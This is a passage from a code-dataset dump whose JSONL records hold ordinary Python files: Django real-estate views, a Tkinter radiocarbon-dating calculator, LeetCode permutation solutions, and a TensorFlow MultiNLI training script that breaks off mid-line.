"sklearn.ensemble.RandomForestClassifier", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.ensemble.ExtraTreesClassifier", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 52, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 58, "usage_type": "call"}, {"api_name": "preprocessing.cleantext.clean_tweet", "line_number": 63, "usage_type": "attribute"}, {"api_name": "preprocessing.cleantext", "line_number": 63, "usage_type": "name"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "ml.modelsaving.save_model", "line_number": 110, "usage_type": "call"}, {"api_name": "ml.modelsaving", "line_number": 110, "usage_type": "name"}, {"api_name": "ml.modelsaving.save_vectorizer", "line_number": 111, "usage_type": "call"}, {"api_name": "ml.modelsaving", "line_number": 111, "usage_type": "name"}, {"api_name": "ml.modelsaving.save_label_encoder", "line_number": 112, "usage_type": "call"}, {"api_name": "ml.modelsaving", "line_number": 112, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 116, "usage_type": "call"}, {"api_name": "preprocessing.cleantext.clean_tweet", "line_number": 120, "usage_type": "attribute"}, {"api_name": "preprocessing.cleantext", "line_number": 120, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 129, "usage_type": "call"}, {"api_name": "ml.features.plot_top_k_features", "line_number": 134, "usage_type": "call"}, {"api_name": "ml.features", "line_number": 134, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 138, "usage_type": "call"}, {"api_name": "argcomplete.autocomplete", "line_number": 149, "usage_type": "call"}]} +{"seq_id": "618082353", "text": "from django.shortcuts import render\n\nfrom django.shortcuts import render\nfrom django.http.response import HttpResponse\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom django.shortcuts import render_to_response\n\nfrom .models import Object, ObjectSearch, News, Agency\n\n\ndef index(request):\n\t\t\n\tobject = Object.objects.filter(publication=\"yes\")\n\tTotal = News.objects.filter().count()\n\t\n\tpopular = Object.objects.filter(publication=\"yes\").filter(rating=5)\n\t\n\t\n\tif Total > 3:\n\t\tnews = News.objects.filter()[Total-3:Total]\n\telse:\n\t\tnews = News.objects.filter()[0:3] \n \n\tf = ObjectSearch(request.GET, queryset=object)\n\t\t\n\t\n\t\t\t\n\t\n\treturn render_to_response('index.html', {'filter':f,'object':object,'news':news, 'popular':popular})\n\t\ndef detail(request,num):\n\tobject = Object.objects.get(pk=int(num))\n\tcod = object.code\n\tprice_min = int(int(object.object_price) - 300000)\n\tprice_max = int(int(object.object_price) + 300000)\n\t\t\n\tagents = Object.objects.filter(code = cod)\n\tclon = Object.objects.raw('SELECT * FROM estate_object')\n\t\n\t\n\t\n\t\n\treturn render_to_response('house-object-new.html',{'object': object,'code':cod,'agent':agents,'clon':clon})\n\t\n\ndef news(request, num):\n\tnews = News.objects.get(id = int(num))\n\treturn render_to_response('news-page.html',{'news': news, 'num':num})\t\n\ndef newslist(request):\n\tnews = News.objects.all()\n\treturn render_to_response('news-list.html',{'news': news})\n\t\ndef agency(request,param):\n\tagency = Agency.objects.get(name=param)\n\treturn render_to_response('agensy.html',{'agency':agency})\n\t", "sub_path": "estate/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1568, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "models.Object.objects.filter", "line_number": 14, "usage_type": "call"}, {"api_name": "models.Object.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "models.Object", "line_number": 14, "usage_type": "name"}, {"api_name": "models.News.objects.filter", "line_number": 15, "usage_type": "call"}, {"api_name": "models.News.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.News", "line_number": 15, "usage_type": "name"}, {"api_name": "models.Object.objects.filter", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Object.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Object", "line_number": 17, "usage_type": "name"}, {"api_name": "models.News.objects.filter", "line_number": 21, "usage_type": "call"}, {"api_name": "models.News.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.News", "line_number": 21, "usage_type": "name"}, {"api_name": "models.News.objects.filter", "line_number": 23, "usage_type": "call"}, {"api_name": "models.News.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.News", "line_number": 23, "usage_type": "name"}, {"api_name": "models.ObjectSearch", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Object.objects.get", "line_number": 33, "usage_type": "call"}, {"api_name": "models.Object.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.Object", "line_number": 33, "usage_type": "name"}, {"api_name": "models.Object.objects.filter", "line_number": 38, "usage_type": "call"}, {"api_name": "models.Object.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models.Object", "line_number": 38, "usage_type": "name"}, {"api_name": "models.Object.objects.raw", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Object.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "models.Object", "line_number": 39, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 44, "usage_type": "call"}, {"api_name": "models.News.objects.get", "line_number": 48, "usage_type": "call"}, {"api_name": "models.News.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models.News", "line_number": 48, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 49, "usage_type": "call"}, {"api_name": "models.News.objects.all", "line_number": 52, "usage_type": "call"}, {"api_name": "models.News.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.News", "line_number": 52, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 53, "usage_type": "call"}, {"api_name": "models.Agency.objects.get", "line_number": 56, "usage_type": "call"}, {"api_name": "models.Agency.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.Agency", "line_number": 56, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "480895804", "text": "#Autor: Johan David Gomez Gil\r\n#Correo: johang0297@gmail.com\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nfrom tkinter import *\r\n\r\ndef calcular_edad(masaInicial,masaFinal,vidaMedia):\r\n\r\n prim = math.log(masaFinal/masaInicial)\r\n seg = math.log(2)\r\n x = (-vidaMedia*(prim)) / seg\r\n x = round(x,4)\r\n #print (x)\r\n return x\r\n\r\ndef graficar(masaInicial,masaFinal,vidaMedia):\r\n masaInicial = float(masaInicial)\r\n masaFinal = float(masaFinal)\r\n edad = calcular_edad(masaInicial,masaFinal,vidaMedia)\r\n texto = 'Interseccion (x = ',edad,' , y = 0)'\r\n x=np.linspace(-600,60000,10000) #Los dos primeros son el rango de X y el ultimo cuantos puntos se quieren\r\n #x=np.arange(14000,15000,1)\r\n\r\n plt.plot(x,h(x,masaInicial,masaFinal,vidaMedia))\r\n plt.grid(True)\r\n plt.text(edad,0,texto)\r\n v = [0,65000,-200,200]\r\n plt.axis(v)\r\n plt.ylabel('Y')\r\n plt.xlabel('X')\r\n plt.show()\r\n\r\ndef h(x,masaInicial,masaFinal,vidaMedia):\r\n #expo = np.e ** ((-x*math.log(2))/5730)\r\n y = masaFinal - masaInicial *(np.e ** ((-x*math.log(2))/vidaMedia))\r\n return y\r\n\r\n\r\n\r\n\r\n#----------------------------Interfaz grafica--------------------------------------------\r\n\r\ndef edad():\r\n\r\n raiz = Tk()\r\n\r\n raiz.title(\"Simulación\")\r\n\r\n opciones = Frame()\r\n opciones.pack(side =\"left\")\r\n opciones.config(width = \"100\", height = \"420\", bd = 3,relief =\"groove\")\r\n\r\n tituloOpciones = Label(opciones, text= \"Opciones\", font = (13))\r\n tituloOpciones.place(x=11,y=0)\r\n\r\n\r\n principal = Frame()\r\n principal.pack(side =\"right\")\r\n principal.config(width = \"650\", height = \"450\")\r\n\r\n masaInicial = Entry(principal)\r\n masaInicial.grid(row= 0, column = 1, pady = 10)\r\n tituloMasaInicial = Label(principal, text= \"Masa inicial: \", font = (13))\r\n tituloMasaInicial.grid(row= 0, column = 0, padx = 20)\r\n\r\n\r\n\r\n masaActual = Entry(principal)\r\n masaActual.grid(row= 1, column = 1, pady = 10)\r\n tituloMasaActual = Label(principal, text= \"Masa actual: \", font = (13))\r\n tituloMasaActual.grid(row= 1, column = 0, padx = 20)\r\n\r\n\r\n #----------------------RESULTADO-----------------------------------------------\r\n\r\n resultadoEdad = StringVar()\r\n\r\n resultado = Entry(principal, textvariable = resultadoEdad)\r\n resultado.grid(row= 2, column = 1, pady = 10, padx = 20)\r\n tituloResultado = Label(principal, text= \"Resultado: \", font = (13))\r\n tituloResultado.grid(row= 2, column = 0, padx = 20)\r\n\r\n #-------Funcion para el boton calcular------------------------------------------\r\n\r\n def calcular(masaInicial,masaFinal,vidaMedia):\r\n\r\n masaIn = float(masaInicial)\r\n masaFin = float(masaFinal)\r\n resultado = calcular_edad(masaIn,masaFin,vidaMedia)\r\n resultadoEdad.set(resultado)\r\n\r\n botonCalcular = Button(principal, text = \"Calcular\", command= lambda: calcular(masaInicial.get(),masaActual.get(),5730))\r\n botonCalcular.grid(row= 2, column = 2, pady = 10)\r\n\r\n botonGraficar = Button(principal, text = \"Graficar\", command= lambda: graficar(masaInicial.get(),masaActual.get(),5730))\r\n botonGraficar.grid(row= 3, column = 0, pady = 10)\r\n botonGraficar.config(width = \"10\", height = \"5\")\r\n\r\n botonSalir = Button(principal, text = \"Salir\" , command = raiz.destroy)\r\n botonSalir.grid(row= 3, column = 1, pady = 10, columnspan=2)\r\n botonSalir.config(width = \"10\", height = \"5\")\r\n \r\n\r\n botonEdad = Button(opciones, text = \"Calcular edad\")\r\n botonEdad.place(x = 5, y= 30)\r\n \r\n\r\n botonVida = Button(opciones, text = \"Calcular vida\\n media\")\r\n botonVida.place(x = 5, y= 60) \r\n\r\n raiz.resizable(0,0)\r\n\r\n raiz.mainloop()\r\n\r\nedad()", "sub_path": "edad.pyw", "file_name": "edad.pyw", "file_ext": "pyw", "file_size_in_byte": 3696, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "math.log", "line_number": 11, "usage_type": "call"}, {"api_name": "math.log", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "numpy.e", "line_number": 37, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "366302414", "text": "\"\"\"\nhttps://leetcode.com/problems/permutations-ii/\nLC047 Permutations II\nMedium\n\nGiven a collection of numbers that might contain duplicates, return all possible unique permutations.\n\"\"\"\n\nfrom itertools import permutations\nfrom math import factorial\nfrom typing import *\n\n\nclass Solution_A1:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n \"\"\"\n use python's internal method, only for testing the speed\n Only permute the idx (non-repeating), as a proxy method, but check repeat after put back to elements\n It is not necessary to use proxy\n \"\"\"\n result = []\n for idxs in permutations(list(range(len(nums)))):\n next_perm = [nums[i] for i in idxs]\n if next_perm not in result:\n result.append(next_perm)\n return result\n\n\nclass Solution_A2:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n \"\"\"\n use python's internal method, only for testing the speed\n Non-proxy version of A1\n \"\"\"\n result = []\n for p in permutations(nums):\n lp = list(p)\n if lp not in result:\n result.append(lp)\n return result\n\n\nclass Solution_B:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n \"\"\"\n Use next nextPermutation from LC031, but use proxy to avoid repeating causing comparison error\n First handle index, then convert to nuns[index], if not repeating then append.\n\n This will pass but way too slow\n revised to use set(tuples) to removed repeats, then sort, it is faster, but still slow\n \"\"\"\n total_n = factorial(len(nums))\n result = []\n idxs = list(range(len(nums)))\n\n for _ in range(total_n):\n each_perm = [nums[i] for i in idxs]\n if each_perm not in result:\n result.append(each_perm)\n self.nextPermutation(idxs)\n\n return result\n\n def nextPermutation(self, nums: List[int]) -> None:\n \"\"\"\n Helper function from LC031\n \"\"\"\n\n if not nums:\n return None\n\n # 从后往前找到第一次出现下降趋势那个元素\n first_idx = len(nums) - 2\n second_idx = len(nums) - 1\n\n # 先定位first_idx\n while first_idx >= 0 and nums[first_idx] >= nums[first_idx + 1]:\n first_idx -= 1\n\n if first_idx == -1: # 如果完美倒序上升,则已经逆序排好,直接反转即可\n nums[:] = nums[:][::-1] # nums.reverse()\n else:\n # 定位second_idx\n # 由于尾部已经是逆序排好, 所以从尾部开始倒退,第一个>first_element的元素就是second_element\n while nums[second_idx] <= nums[first_idx]:\n second_idx -= 1\n\n # complete the swap\n nums[first_idx], nums[second_idx] = nums[second_idx], nums[first_idx]\n # reverse element after first_idx\n nums[first_idx + 1:] = nums[first_idx + 1:][::-1]\n\n\n\nclass Solution_C1:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n \"\"\"\n recursive method modified from leetcode LC046 Version C\n revised the recursion rule by bypassing the repeated next_list\n \"\"\"\n\n def permuteUniHelper(lst: List[int], permute_list: List[int] = []) -> None:\n \"\"\"Helper from LC046 Version C\"\"\"\n\n if len(lst) == 0: # all elements got picked\n result.append(permute_list)\n else:\n sub_list_check = [] # create a next_list_list\n for i in range(len(lst)):\n sub_list = lst[:] # it will be the sub-list after the pop\n picked = sub_list.pop(i)\n\n # must check on sorted to avoid same sub_list in different sequence!\n sub_list_sorted = sorted(sub_list)\n\n # Modification: Recursively removing repeating sub_list through each pick\n if sub_list_sorted not in sub_list_check:\n sub_list_check.append(sub_list_sorted)\n updated_permute_list = permute_list + [picked]\n permuteUniHelper(sub_list, updated_permute_list)\n\n result = []\n permuteUniHelper(nums)\n return result\n\n\nclass Solution_C2:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n \"\"\"\n Version C1 modified\n Sort nums first to avoid sort sub_list check for repeating\n\n So far, this is the best solution\n \"\"\"\n\n def permuteUniHelper(lst: List[int], permute_list: List[int] = []) -> None:\n \"\"\"Helper from LC046 Version C\"\"\"\n\n if len(lst) == 0:\n result.append(permute_list)\n else:\n sub_list_check = [] # create a next_list_list\n for i in range(len(lst)):\n sub_list = lst[:] # it will be the sub-list after the pop\n picked = sub_list.pop(i)\n\n if sub_list not in sub_list_check:\n sub_list_check.append(sub_list)\n updated_permute_list = permute_list + [picked]\n permuteUniHelper(sub_list, updated_permute_list)\n\n nums = sorted(nums) # sort first to avoid repeating issue\n result = []\n permuteUniHelper(nums)\n return result\n\n\n\nclass Solution_D:\n def permuteUnique(self, nums: List[int]):\n \"\"\"\n Pure recursive method, single and pure recursion modified from leetcode LC046 version D\n Revised the recursion rule by bypassing the repeated next_list\n\n Must sort sub_list for checking repeat, unlike version C\n The sort nums can not be separated from main function, like the way version C uses helper\n \"\"\"\n\n length = len(nums)\n if length == 1:\n return [nums]\n else:\n result = []\n sub_list_check = [] # add an intermediate step to prevent repeats\n for i in range(len(nums)):\n sub_list = nums[:]\n picked = sub_list.pop(i)\n\n # must check on sorted to avoid same sub_list in different sequence!\n sub_list_sorted = sorted(sub_list)\n\n # Recursively removing repeating sub_list through each pick\n if sub_list_sorted not in sub_list_check:\n sub_list_check.append(sub_list_sorted)\n result += [[picked] + per for per in self.permuteUnique(sub_list)]\n return result\n\n\n\nif __name__ == \"__main__\":\n testCase = Solution_C2()\n assert testCase.permuteUnique([1]) == [\n [1]\n ], \"Edge 1\"\n\n assert sorted(testCase.permuteUnique([1, 2, 3])) == [\n [1, 2, 3],\n [1, 3, 2],\n [2, 1, 3],\n [2, 3, 1],\n [3, 1, 2],\n [3, 2, 1]\n ], \"Example 1\"\n\n assert sorted(testCase.permuteUnique([3, 2, 1])) == [\n [1, 2, 3],\n [1, 3, 2],\n [2, 1, 3],\n [2, 3, 1],\n [3, 1, 2],\n [3, 2, 1]\n ], \"Example 1 addtional\"\n\n assert sorted(testCase.permuteUnique([1, 1, 2])) == [\n [1, 1, 2],\n [1, 2, 1],\n [2, 1, 1]\n ], \"Example 2\"\n\n assert sorted(testCase.permuteUnique([2, 1, 1])) == [\n [1, 1, 2],\n [1, 2, 1],\n [2, 1, 1]\n ], \"Example 2 additional\"\n\n\n assert sorted(testCase.permuteUnique([3, 3, 0, 3])) == [\n [0, 3, 3, 3],\n [3, 0, 3, 3],\n [3, 3, 0, 3],\n [3, 3, 3, 0]\n ], \"Additional 1\"\n\n print(\"All passed\")\n", "sub_path": "LeetCode/LC047_permutations_ii.py", "file_name": "LC047_permutations_ii.py", "file_ext": "py", "file_size_in_byte": 7609, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "itertools.permutations", "line_number": 22, "usage_type": "call"}, {"api_name": "itertools.permutations", "line_number": 36, "usage_type": "call"}, {"api_name": "math.factorial", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "118620988", "text": "\"\"\"\nTraining script to train a model on MultiNLI and, optionally, on SNLI data as well.\nThe \"alpha\" hyperparamaters set in paramaters.py determines if SNLI data is used in training. If alpha = 0, no SNLI data\nis used in training. If alpha > 0, then down-sampled SNLI data is used in training.\n\"\"\"\nimport os\nimport importlib\nimport pickle\n\nimport tensorflow as tf\nimport random\nfrom utils import logger\nimport utils.parameters as params\nfrom utils.data_processing import *\nfrom utils.evaluate import *\n\nFIXED_PARAMETERS = params.load_parameters()\nmodname = FIXED_PARAMETERS[\"model_name\"]\nlogpath = os.path.join(FIXED_PARAMETERS[\"log_path\"], modname) + \".log\"\nlogger = logger.Logger(logpath)\n\nmodel = FIXED_PARAMETERS[\"model_type\"]\n\nmodule = importlib.import_module(\".\".join(['models', model]))\nMyModel = getattr(module, 'MyModel')\n\n# Logging parameter settings at each launch of training script\n# This will help ensure nothing goes awry in reloading a model and we consistenyl use the same hyperparameter settings.\nlogger.log(\"FIXED_PARAMETERS\\n%s\" % FIXED_PARAMETERS)\n\nlogger.log(\"Loading data\")\ntraining_snli = load_nli_data(FIXED_PARAMETERS[\"training_snli\"], snli=True, udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.training_snli.cache')\ndev_snli = load_nli_data(FIXED_PARAMETERS[\"dev_snli\"], snli=True, udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.dev_snli.cache')\ntest_snli = load_nli_data(FIXED_PARAMETERS[\"test_snli\"], snli=True, udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.test_snli.cache')\n\ntraining_mnli = load_nli_data(FIXED_PARAMETERS[\"training_mnli\"], udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.training_mnli.cache')\ndev_matched = load_nli_data(FIXED_PARAMETERS[\"dev_matched\"], udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.dev_matched.cache')\ndev_mismatched = load_nli_data(FIXED_PARAMETERS[\"dev_mismatched\"], udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.dev_mismatched.cache')\ntest_matched = load_nli_data(FIXED_PARAMETERS[\"test_matched\"], udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.test_matched.cache')\ntest_mismatched = load_nli_data(FIXED_PARAMETERS[\"test_mismatched\"], udpipe_path=FIXED_PARAMETERS['udpipe_path'],\n seq_length=FIXED_PARAMETERS['seq_length'], r=FIXED_PARAMETERS['s2_dim'],\n cache_file=os.path.join(FIXED_PARAMETERS[\"log_path\"], modname)+'.test_mismatched.cache')\n\nif 'temp.jsonl' in FIXED_PARAMETERS[\"test_matched\"]:\n # Removing temporary empty file that was created in parameters.py\n os.remove(FIXED_PARAMETERS[\"test_matched\"])\n logger.log(\"Created and removed empty file called temp.jsonl since test set is not available.\")\n\ndictpath = os.path.join(FIXED_PARAMETERS[\"log_path\"], modname) + \".p\"\n\nif not os.path.isfile(dictpath):\n logger.log(\"Building dictionary\")\n if FIXED_PARAMETERS[\"alpha\"] == 0:\n word_indices = build_dictionary([training_mnli])\n else:\n word_indices = build_dictionary([training_mnli, training_snli])\n\n logger.log(\"Padding and indexifying sentences\")\n sentences_to_padded_index_sequences(word_indices,\n [training_mnli, training_snli, dev_matched, dev_mismatched, dev_snli, test_snli,\n test_matched, test_mismatched])\n pickle.dump(word_indices, open(dictpath, \"wb\"))\n\nelse:\n logger.log(\"Loading dictionary from %s\" % dictpath)\n word_indices = pickle.load(open(dictpath, \"rb\"))\n logger.log(\"Padding and indexifying sentences\")\n sentences_to_padded_index_sequences(word_indices,\n [training_mnli, training_snli, dev_matched, dev_mismatched, dev_snli, test_snli,\n test_matched, test_mismatched])\n\nlogger.log(\"Loading embeddings\")\nloaded_embeddings = load_embedding_rand(FIXED_PARAMETERS[\"embedding_data_path\"], word_indices)\n\n\nclass ModelClassifier:\n def __init__(self):\n # Define hyperparameters\n self.model_type = FIXED_PARAMETERS[\"model_type\"]\n self.learning_rate = FIXED_PARAMETERS[\"learning_rate\"]\n self.display_epoch_freq = 1\n self.display_step_freq = 50\n self.batch_size = FIXED_PARAMETERS[\"batch_size\"]\n self.keep_rate = FIXED_PARAMETERS[\"keep_rate\"]\n self.alpha = FIXED_PARAMETERS[\"alpha\"]\n self.seq_length = FIXED_PARAMETERS['seq_length']\n self.udpipe_path = FIXED_PARAMETERS['udpipe_path']\n FIXED_PARAMETERS['embeddings'] = loaded_embeddings\n\n logger.log(\"Building model from %s.py\" % model)\n self.model = MyModel(**FIXED_PARAMETERS)\n\n # Perform gradient descent with Adam\n self.optimizer = tf.train.AdamOptimizer(self.learning_rate, beta1=0.9, beta2=0.999).minimize(\n self.model.total_cost)\n\n # Boolean stating that training has not been completed,\n self.completed = False\n\n # tf things: initialize variables and create placeholder for session\n logger.log(\"Initializing variables\")\n self.init = tf.global_variables_initializer()\n self.sess = None\n self.saver = tf.train.Saver()\n\n def get_minibatch(self, dataset, start_index, end_index):\n indices = range(start_index, end_index)\n premise_vectors = np.vstack([dataset[i]['sentence1_binary_parse_index_sequence'] for i in indices])\n hypothesis_vectors = np.vstack([dataset[i]['sentence2_binary_parse_index_sequence'] for i in indices])\n genres = [dataset[i]['genre'] for i in indices]\n labels = [dataset[i]['label'] for i in indices]\n\n prem_dep = None\n hypo_dep = None\n\n if self.udpipe_path:\n prem_dep = np.stack([dataset[i]['prem_dep'] for i in indices])\n hypo_dep = np.stack([dataset[i]['hypo_dep'] for i in indices])\n\n return premise_vectors, hypothesis_vectors, labels, genres, prem_dep, hypo_dep\n\n def train(self, train_mnli, train_snli, dev_mat, dev_mismat, dev_snli):\n self.sess = tf.Session()\n self.sess.run(self.init)\n\n self.step = 0\n self.epoch = 0\n self.best_dev_mat = 0.\n self.best_mtrain_acc = 0.\n self.last_train_acc = [.001, .001, .001, .001, .001]\n self.best_step = 0\n\n # Restore most recent checkpoint if it exists.\n # Also restore values for best dev-set accuracy and best training-set accuracy\n ckpt_file = os.path.join(FIXED_PARAMETERS[\"ckpt_path\"], modname) + \".ckpt\"\n if os.path.isfile(ckpt_file + \".meta\"):\n if os.path.isfile(ckpt_file + \"_best.meta\"):\n self.saver.restore(self.sess, (ckpt_file + \"_best\"))\n self.best_dev_mat, dev_cost_mat = evaluate_classifier(self.classify, dev_mat, self.batch_size)\n best_dev_mismat, dev_cost_mismat = evaluate_classifier(self.classify, dev_mismat, self.batch_size)\n best_dev_snli, dev_cost_snli = evaluate_classifier(self.classify, dev_snli, self.batch_size)\n self.best_mtrain_acc, mtrain_cost = evaluate_classifier(self.classify, train_mnli[0:5000],\n self.batch_size)\n if self.alpha != 0.:\n self.best_strain_acc, strain_cost = evaluate_classifier(self.classify, train_snli[0:5000],\n self.batch_size)\n logger.log(\n \"Restored best matched-dev acc: %f\\nRestored best mismatched-dev acc: %f\\nRestored best \"\n \"SNLI-dev acc: %f\\nRestored best MulitNLI train acc: %f\\nRestored best SNLI train acc: %f\" %\n (self.best_dev_mat, best_dev_mismat, best_dev_snli, self.best_mtrain_acc, self.best_strain_acc))\n else:\n logger.log(\n \"Restored best matched-dev acc: %f\\nRestored best mismatched-dev acc: %f\\nRestored best \"\n \"SNLI-dev acc: %f\\nRestored best MulitNLI train acc: %f\" % ( \n self.best_dev_mat, best_dev_mismat, best_dev_snli, self.best_mtrain_acc))\n\n self.saver.restore(self.sess, ckpt_file)\n logger.log(\"Model restored from file: %s\" % ckpt_file)\n\n # Combine MultiNLI and SNLI data. Alpha has a default value of 0, if we want to use SNLI data, it must be\n # passed as an argument.\n beta = int(self.alpha * len(train_snli))\n\n # Training cycle\n logger.log(\"Training...\")\n logger.log(\"Model will use %s percent of SNLI data during training\" % (self.alpha * 100))\n\n while True:\n training_data = train_mnli + random.sample(train_snli, beta)\n random.shuffle(training_data)\n avg_cost = 0.\n total_batch = int(len(training_data) / self.batch_size)\n\n # Loop over all batches in epoch\n for i in range(total_batch):\n # Assemble a minibatch of the next B examples\n minibatch_premise_vectors, minibatch_hypothesis_vectors, minibatch_labels, minibatch_genres, \\\n minibatch_prem_dep, minibatch_hypo_dep = \\\n self.get_minibatch(training_data, self.batch_size * i, self.batch_size * (i + 1))\n\n # Run the optimizer to take a gradient step, and also fetch the value of the\n # cost function for logging\n feed_dict = {self.model.premise_x: minibatch_premise_vectors,\n self.model.hypothesis_x: minibatch_hypothesis_vectors,\n self.model.y: minibatch_labels,\n self.model.keep_rate_ph: self.keep_rate}\n\n if 'dep_avg' in self.model_type:\n feed_dict[self.model.prem_dep] = minibatch_prem_dep\n feed_dict[self.model.hypo_dep] = minibatch_hypo_dep\n\n _, c = self.sess.run([self.optimizer, self.model.total_cost], feed_dict)\n\n # Compute average loss\n avg_cost += c / (total_batch * self.batch_size)\n\n if self.step % self.display_step_freq == 0:\n logger.log(\"Epoch %i, step %i\\tAvg. train cost: %f\" % (\n self.epoch, self.step, avg_cost * total_batch / i))\n # if self.alpha != 0.:\n # strain_acc, strain_cost = evaluate_classifier(self.classify, train_snli[0:5000],\n # self.batch_size)\n # dev_acc_snli, dev_cost_snli = evaluate_classifier(self.classify, dev_snli, self.batch_size)\n # logger.log(\n # \"Epoch %i, step %i\\tDev-matched acc: %f\\tDev-mismatched acc: %f\\tDev-SNLI acc: %f\\t\"\n # \"MultiNLI train acc: %f\\tSNLI train acc: %f\" % (\n # self.step, dev_acc_mat, dev_acc_mismat, dev_acc_snli, mtrain_acc, strain_acc))\n # logger.log(\n # \"Epoch %i, step %i\\tDev-matched cost: %f\\tDev-mismatched cost: %f\\tDev-SNLI cost: %f\\t\"\n # \"MultiNLI train cost: %f\\tSNLI train cost: %f\" % (\n # self.step, dev_cost_mat, dev_cost_mismat, dev_cost_snli, mtrain_cost, strain_cost))\n # else:\n\n if self.step % 500 == 0:\n mtrain_acc, mtrain_cost = evaluate_classifier(self.classify, train_mnli[0:5000], self.batch_size)\n dev_acc_mat, dev_cost_mat = evaluate_classifier(self.classify, dev_mat, 